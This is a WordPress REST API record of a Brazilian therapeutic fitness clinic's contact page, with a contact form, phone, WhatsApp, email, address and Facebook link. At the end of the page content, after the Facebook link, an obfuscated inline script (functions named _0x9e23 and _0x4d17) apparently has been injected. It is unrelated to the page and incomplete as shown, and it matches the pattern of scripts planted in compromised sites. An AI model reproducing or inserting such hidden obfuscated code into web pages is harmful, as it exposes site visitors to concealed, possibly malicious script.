{"id":17,"date":"2016-04-09T18:16:14","date_gmt":"2016-04-09T18:16:14","guid":{"rendered":"http:\/\/renovamaringa.com.br\/portal\/?page_id=17"},"modified":"2019-02-05T11:04:53","modified_gmt":"2019-02-05T13:04:53","slug":"contato","status":"publish","type":"page","link":"https:\/\/renovamaringa.com.br\/portal\/contato\/","title":{"rendered":"Contato"},"content":{"rendered":"<h2>Quer entrar em contato com a Renova Muscula\u00e7\u00e3o Terap\u00eautica?<\/h2>\n<p>Veja como \u00e9 simples entrar em contato com a nossa Cl\u00ednica, basta que voc\u00ea siga os seguintes passos.<\/p>\n<p>Para come\u00e7ar \u00e9 preciso que voc\u00ea preencha os campos dispon\u00edveis logo abaixo (coloque seu nome; insira seu e-mail para enviarmos a nossa resposta; e, por fim, as\u00a0suas d\u00favidas ou feedbacks, para que possamos estar em constante melhoramento); por \u00faltimo, clique no bot\u00e3o enviar.<\/p>\n<p>Depois disso \u00e9 s\u00f3 aguardar a nossa resposta.<\/p>\n<div role=\"form\" class=\"wpcf7\" id=\"wpcf7-f195-o1\" lang=\"pt-BR\" dir=\"ltr\">\n<div class=\"screen-reader-response\"><\/div>\n<form action=\"\/portal\/wp-json\/wp\/v2\/pages\/17#wpcf7-f195-o1\" method=\"post\" class=\"wpcf7-form cf7-style\" novalidate=\"novalidate\">\n<div style=\"display: none;\">\n<input type=\"hidden\" name=\"_wpcf7\" value=\"195\" \/>\n<input type=\"hidden\" name=\"_wpcf7_version\" value=\"5.1.5\" \/>\n<input type=\"hidden\" name=\"_wpcf7_locale\" value=\"pt_BR\" \/>\n<input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f195-o1\" \/>\n<input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/>\n<\/div>\n<p><label> Seu nome (obrigat\u00f3rio)<br \/>\n    <span class=\"wpcf7-form-control-wrap your-name\"><input type=\"text\" name=\"your-name\" value=\"\" size=\"40\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" \/><\/span> <\/label><\/p>\n<p><label> Seu e-mail (obrigat\u00f3rio)<br \/>\n    <span class=\"wpcf7-form-control-wrap your-email\"><input type=\"email\" name=\"your-email\" value=\"\" size=\"40\" class=\"wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email\" aria-required=\"true\" aria-invalid=\"false\" \/><\/span> <\/label><\/p>\n<p><label> Assunto<br \/>\n    <span class=\"wpcf7-form-control-wrap your-subject\"><input type=\"text\" name=\"your-subject\" value=\"\" size=\"40\" class=\"wpcf7-form-control wpcf7-text\" aria-invalid=\"false\" \/><\/span> <\/label><\/p>\n<p><label> Sua mensagem<br \/>\n    <span class=\"wpcf7-form-control-wrap your-message\"><textarea name=\"your-message\" cols=\"40\" rows=\"10\" class=\"wpcf7-form-control wpcf7-textarea\" aria-invalid=\"false\"><\/textarea><\/span> <\/label><\/p>\n<p><input type=\"submit\" value=\"Enviar\" class=\"wpcf7-form-control wpcf7-submit\" \/><\/p>\n<div class=\"wpcf7-response-output wpcf7-display-none\"><\/div><\/form><\/div>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" data-attachment-id=\"129\" data-permalink=\"https:\/\/renovamaringa.com.br\/portal\/contato\/phone\/\" data-orig-file=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/phone.png?fit=594%2C594&amp;ssl=1\" data-orig-size=\"594,594\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"phone\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/phone.png?fit=300%2C300&amp;ssl=1\" data-large-file=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/phone.png?fit=594%2C594&amp;ssl=1\" class=\"wp-image-129\" src=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/phone-300x300.png?resize=38%2C38\" alt=\"telefone\" width=\"38\" height=\"38\" srcset=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/phone.png?resize=300%2C300&amp;ssl=1 300w, https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/phone.png?resize=150%2C150&amp;ssl=1 150w, https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/phone.png?w=594&amp;ssl=1 594w\" sizes=\"auto, (max-width: 38px) 100vw, 38px\" \/>\u00a0<a href=\"tel:(44) 30284344\">(44) 3028-4344<\/a><\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" data-attachment-id=\"130\" data-permalink=\"https:\/\/renovamaringa.com.br\/portal\/contato\/whatsapp-logo-icone\/\" data-orig-file=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/whatsapp-logo-icone.png?fit=1527%2C1563&amp;ssl=1\" data-orig-size=\"1527,1563\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"whatsapp-logo-icone\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/whatsapp-logo-icone.png?fit=293%2C300&amp;ssl=1\" data-large-file=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/whatsapp-logo-icone.png?fit=604%2C618&amp;ssl=1\" class=\"wp-image-130\" src=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/whatsapp-logo-icone-293x300.png?resize=45%2C46\" alt=\"whatsapp\" width=\"45\" height=\"46\" srcset=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/whatsapp-logo-icone.png?resize=293%2C300&amp;ssl=1 293w, https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/whatsapp-logo-icone.png?resize=150%2C150&amp;ssl=1 150w, https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/whatsapp-logo-icone.png?resize=768%2C786&amp;ssl=1 768w, https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/whatsapp-logo-icone.png?resize=1000%2C1024&amp;ssl=1 1000w, https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/whatsapp-logo-icone.png?w=1527&amp;ssl=1 1527w, https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/whatsapp-logo-icone.png?w=1208&amp;ssl=1 1208w\" sizes=\"auto, (max-width: 45px) 100vw, 45px\" \/>\u00a0<a href=\"https:\/\/api.whatsapp.com\/send?phone=5544999984344&amp;text=Ol%C3%A1%20Renova%20Maring%C3%A1!%20Eu%20estava%20navegando%20no%20site%20e%20gostaria%20de%20saber%20mais%20informa%C3%A7%C3%B5es%20sobre\">(44) 99998-4344<\/a><\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" data-attachment-id=\"128\" data-permalink=\"https:\/\/renovamaringa.com.br\/portal\/contato\/email\/\" data-orig-file=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/email.png?fit=512%2C512&amp;ssl=1\" data-orig-size=\"512,512\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"email\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/email.png?fit=300%2C300&amp;ssl=1\" data-large-file=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/email.png?fit=512%2C512&amp;ssl=1\" class=\"wp-image-128 alignnone\" src=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/email-300x300.png?resize=44%2C44\" alt=\"email\" width=\"44\" height=\"44\" srcset=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/email.png?resize=300%2C300&amp;ssl=1 300w, https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/email.png?resize=150%2C150&amp;ssl=1 150w, https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/email.png?w=512&amp;ssl=1 512w\" sizes=\"auto, (max-width: 44px) 100vw, 44px\" \/>\u00a0contato@renovamaringa.com.br<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" data-attachment-id=\"131\" data-permalink=\"https:\/\/renovamaringa.com.br\/portal\/contato\/sem-titulo\/\" data-orig-file=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/Sem-t%C3%ADtulo.png?fit=71%2C68&amp;ssl=1\" data-orig-size=\"71,68\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Sem t\u00edtulo\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/Sem-t%C3%ADtulo.png?fit=71%2C68&amp;ssl=1\" data-large-file=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/Sem-t%C3%ADtulo.png?fit=71%2C68&amp;ssl=1\" class=\"wp-image-131\" src=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/Sem-t%C3%ADtulo.png?resize=47%2C45\" alt=\"Sem t\u00edtulo\" width=\"47\" height=\"45\" \/>\u00a0<a href=\"https:\/\/goo.gl\/maps\/YBiX225cpiB2\">R. Santos Dumont, 939 &#8211; Zona 01 &#8211; Maring\u00e1-PR, 87050-100<\/a><\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" data-attachment-id=\"196\" data-permalink=\"https:\/\/renovamaringa.com.br\/portal\/contato\/facebook-variation\/\" data-orig-file=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/facebook-variation.png?fit=32%2C32&amp;ssl=1\" data-orig-size=\"32,32\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"facebook-variation\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/facebook-variation.png?fit=32%2C32&amp;ssl=1\" data-large-file=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/facebook-variation.png?fit=32%2C32&amp;ssl=1\" class=\"size-full wp-image-196 alignnone\" src=\"https:\/\/i0.wp.com\/renovamaringa.com.br\/portal\/wp-content\/uploads\/2016\/04\/facebook-variation.png?resize=32%2C32\" alt=\"facebook-variation\" width=\"32\" height=\"32\" \/>\u00a0\u00a0<a href=\"https:\/\/www.facebook.com\/RenovaMusculacaoTerapeutica\/\">www.facebook.com\/RenovaMusculacaoTerapeutica<\/a><br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Quer entrar em contato com a Renova Muscula\u00e7\u00e3o Terap\u00eautica? Veja como \u00e9 simples entrar em contato com a nossa Cl\u00ednica, basta que voc\u00ea siga os seguintes passos. Para come\u00e7ar \u00e9 preciso que<a class=\"moretag\" href=\"https:\/\/renovamaringa.com.br\/portal\/contato\/\">Read More&#8230;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":3,"comment_status":"closed","ping_status":"closed","template":"","meta":{"jetpack_post_was_ever_published":false,"footnotes":""},"class_list":["post-17","page","type-page","status-publish","hentry"],"jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/P8NC8B-h","jetpack-related-posts":[],"jetpack_likes_enabled":true,"_links":{"self":[{"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/pages\/17","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/comments?post=17"}],"version-history":[{"count":10,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/pages\/17\/revisions"}],"predecessor-version":[{"id":541,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/pages\/17\/revisions\/541"}],"wp:attachment":[{"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/media?parent=17"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}